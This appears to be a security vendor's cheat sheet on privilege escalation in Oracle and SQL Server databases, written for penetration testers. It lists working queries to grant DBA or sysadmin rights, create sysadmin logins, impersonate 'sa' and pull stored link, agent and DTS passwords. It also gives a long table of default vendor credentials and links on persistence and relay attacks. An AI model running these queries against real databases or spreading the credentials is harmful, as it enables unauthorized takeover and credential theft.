No data yet, please contribute on our Github if you know any useful methods!
Privilege Escalation
Certain functionalities require a privileged user and for escalating a vulnerability a privileged user is always the first step.
* Requires privileged user
| Description | Query |
|---|---|
| Dump All DBA Usernames | SELECT username FROM user_role_privs WHERE granted_role='DBA'; |
| Make User DBA | * GRANT DBA to USER |
| Create Procedure | CREATE OR REPLACE PROCEDURE “SYSTEM".netspi1 (id IN VARCHAR2) AS PRAGMA autonomous_transaction; EXECUTE IMMEDIATE 'grant dba to scott'; COMMIT; END; BEGIN SYSTEM.netspi1('netspi'); END; |
| Find Database Links | SELECT * FROM DBA_DB_LINKS SELECT * FROM ALL_DB_LINKS SELECT * FROM USER_DB_LINKS |
| Query Database Links | SELECT * FROM sales@miami -- minimum for preconfigured SELECT * FROM harold@netspi.com -- standard usage for selecting table from schema on remote server SELECT * FROM harold@netspi.com@hq_1 -- standard usage for selecting table from schema on remote server instance SELECT db_link,password FROM user_db_links WHERE db_link LIKE 'TEST%'' SELECT name,password FROM sys.link$ WHERE name LIKE 'TEST%'; SELECT name,passwordx FROM sys.link$ WHERE name LIKE 'TEST%'; |
| Execute stored procedures on database links | EXEC mySchema.myPackage.myProcedure@myRemoteDB( 'someParameter' ); SELECT dbms_xmlquery.getxml('select * from emp') FROM harold@netspi.com |
| Creating database links | CREATE SHARED PUBLIC DATABASE LINK supply.us.netspi.com; -- connected user setup CREATE SHARED PUBLIC DATABASE LINK supply.us.netspi.com CONNECT TO harold AS tiger; -- standard defined user/pass CREATE SHARED PUBLIC DATABASE LINK hq.netspi.com.com@hq_1 USING 'string_to_hq_1'; -- instance specific CREATE SHARED PUBLIC DATABASE LINK link_2 CONNECT TO jane IDENTIFIED BY doe USING 'us_supply'; -- defined user/pass |
| Removing Links | DROP DATABASE LINK miami; |
Privilege Escalation
Certain functionalities require a privileged user and for escalating a vulnerability a privileged user is always the first step.
* Requires privileged user. The queries below require various privilege types. Stay tuned for detailed privilege escalation paths.
| Description | Query |
|---|---|
| Make User DBA | * EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; |
| Grant Execute on All Custom Objects | SELECT 'grant exec on ' + QUOTENAME(ROUTINE_SCHEMA) + '.' + QUOTENAME(ROUTINE_NAME) + ' TO test' FROM INFORMATION_SCHEMA.ROUTINES WHERE OBJECTPROPERTY(OBJECT_ID(ROUTINE_NAME),'IsMSShipped') = 0 ; |
| Grant Execute on All Store Procedures | CREATE ROLE db_executor GRANT EXECUTE TO db_executor exec sp_addrolemember 'db_executor', 'YourSecurityAccount' |
| UNC Path Injection | https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/ |
| Detect Impersonatable logins | SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' |
| Impersonate Login Note: REVERT will bring you back to your original login. |
EXECUTE AS LOGIN = 'sa'; SELECT @@VERSION; |
| Create sysadmin user | * USE [master] GO CREATE LOGIN [test] WITH PASSSWORD=N 'test', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF GO EXEC master..sp_addsrvrolemember @loginame=N'test', @rolename=N'sysadmin' GO |
| Create sysadmin user | * EXEC sp_addlogin 'user', 'pass'; * EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; |
| Drop User | * EXEC sp_droplogin 'user'; | Retrieve SQL Agent Connection Passwords | exec msdb.dbo.sp_get_sqlagent_properties |
| Retrieve DTS Connection Passwords | select msdb.dbo.rtbldmbprops |
| Get sysadmin as local admin | https://blog.netspi.com/get-sql-server-sysadmin-privileges-local-admin-powerupsql/ |
| Startup stored procedures | https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ |
| Trigger creation | https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/ |
| Windows auto-logon passwords | https://blog.netspi.com/get-windows-auto-login-passwords-via-sql-server-powerupsql/ |
| xp_regwrite non-sysadmin execution | https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e |
| Stored procedures with trustworthy databases | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases |
| Stored procedure user impersonation | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/ |
| Default passwords | sa:sa sa:[empty] [username]:[username] |
| Default passwords for instances (Instance name, User, Pass) | "ACS","ej","ej" "ACT7","sa","sage" "AOM2","admin","ca_admin" "ARIS","ARIS9","*ARIS!1dm9n#" "AutodeskVault","sa","AutodeskVault@26200" "BOSCHSQL","sa","RPSsql12345" "BPASERVER9","sa","AutoMateBPA9" "CDRDICOM","sa","CDRDicom50!" "CODEPAL","sa","Cod3p@l" "CODEPAL08","sa","Cod3p@l" "CounterPoint","sa","CounterPoint8" "CSSQL05","ELNAdmin","ELNAdmin" "CSSQL05","sa","CambridgeSoft_SA" "CADSQL","CADSQLAdminUser","Cr41g1sth3M4n!" "DHLEASYSHIP","sa","DHLadmin@1" "DPM","admin","ca_admin" "DVTEL","sa","" "EASYSHIP","sa","DHLadmin@1" "ECC","sa","Webgility2011" "ECOPYDB","e+C0py2007_@x","e+C0py2007_@x" "ECOPYDB","sa","ecopy" "Emerson2012","sa","42Emerson42Eme" "HDPS","sa","sa" "HPDSS","sa","Hpdsdb000001" "HPDSS","sa","hpdss" "INSERTGT","msi","keyboa5" "INSERTGT","sa","" "INTRAVET","sa","Webster#1" "MYMOVIES","sa","t9AranuHA7" "PCAMERICA","sa","pcAmer1ca" "PCAMERICA","sa","PCAmerica" "PRISM","sa","SecurityMaster08" "RMSQLDATA","Super","Orange" "RTCLOCAL","sa","mypassword" "SALESLOGIX","sa","SLXMaster" "SIDEXIS_SQL","sa","2BeChanged" "SQL2K5","ovsd","ovsd" "SQLEXPRESS","admin","ca_admin" "STANDARDDEV2014","test","test" "TEW_SQLEXPRESS","tew","tew" "vocollect","vocollect","vocollect" "VSDOTNET","sa","" "VSQL","sa","111" |
© 2023 Copyright by NetSPI. All rights reserved.